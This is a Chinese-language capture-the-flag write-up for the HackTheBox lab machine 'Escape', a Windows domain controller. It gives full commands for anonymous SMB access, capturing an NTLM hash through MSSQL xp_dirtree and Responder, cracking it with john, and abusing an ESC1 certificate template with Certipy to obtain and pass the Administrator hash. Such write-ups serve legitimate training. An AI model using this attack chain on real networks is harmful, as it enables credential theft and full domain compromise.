Escape - HackTheBox

基本信息

• https://www.hackthebox.com/home/machines/profile/531

• 10.10.11.202

端口扫描

windows域靶机，还有445，1433：

$ nmap -sC -sV -Pn 10.10.11.202
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-28 14:57 CST
Nmap scan report for 10.10.11.202
Host is up (0.081s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-02-28 14:58:09Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-02-28T14:59:31+00:00; +8h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-02-28T14:59:30+00:00; +8h00m01s from scanner time.
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2023-02-28T14:59:31+00:00; +8h00m00s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-02-28T14:54:27
|_Not valid after:  2053-02-28T14:54:27
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-28T14:59:31+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-02-28T14:59:30+00:00; +8h00m01s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2023-02-28T14:58:53
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 139.60 seconds

SMB

smb匿名访问，public里得到一个pdf：

smbclient -N -L 10.10.11.202
smbclient -N //10.10.11.202/Public
get "SQL Server Procedures.pdf"

SQL Server Procedures.pdf

pdf中给出了mssql的账号密码：

PublicUser
GuestUserCantWrite1

MSSQL

使用得到的账号密码连接：

impacket-mssqlclient PublicUser:GuestUserCantWrite1@10.10.11.202

常规responder+xp_dirtree得到sql_svc hash：

sudo python3 Responder.py -i 10.10.14.9 -v

SQL> exec xp_dirtree '\\10.10.14.9\miao'

破解出来密码：

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

REGGIE1234ronnie (sql_svc)

sql_svc

使用得到的密码登录,现在还不是user：

evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie

翻文件发现C:\SQLServer\logs中有一个日志文件，其中得到另一个用户的账号密码，模拟的是使用用户账号密码登录数据库被记录到日志中的场景：

sequel.htb\Ryan.Cooper
NuclearMosquito3

user flag

使用sql日志中得到的账号密码登录，桌面得到user flag：

evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3

ADCS

提权部分是adcs，可以使用certipy远程进行：

• ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
  https://github.com/ly4k/Certipy

发现脆弱的证书模板：

certipy find -vulnerable -stdout -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -dc-ip 10.10.11.202

Template Name                       : UserAuthentication
Display Name                        : UserAuthentication
Certificate Authorities             : sequel-DC-CA

ESC1

直接根据文档里的ESC1利用方式一步步来即可得到administrator的NTLM hash：

certipy req -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -target 10.10.11.202 -template UserAuthentication -ca sequel-DC-CA -upn administrator@sequel.htb -dns 10.10.11.202 -dc-ip 10.10.11.202

# auth时可能会报错时钟偏移问题，先ntp同步时间
sudo ntpdate -s 10.10.11.202

certipy-ad auth -pfx administrator_10.pfx -dc-ip 10.10.11.202

[*] Got NT hash for 'administrator@sequel.htb': a52f78e4c751e5f5e17e1e9f3e58f4ee

root flag

使用得到的hash登录：

evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE

参考资料

• ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
  https://github.com/ly4k/Certipy
• Writeup Escape HackTheBox
  https://gatogamer1155.github.io/htb/escape/
• Escape - HTB [Discussion] | BreachForums
  https://breached.vc/Thread-Escape-HTB-Discussion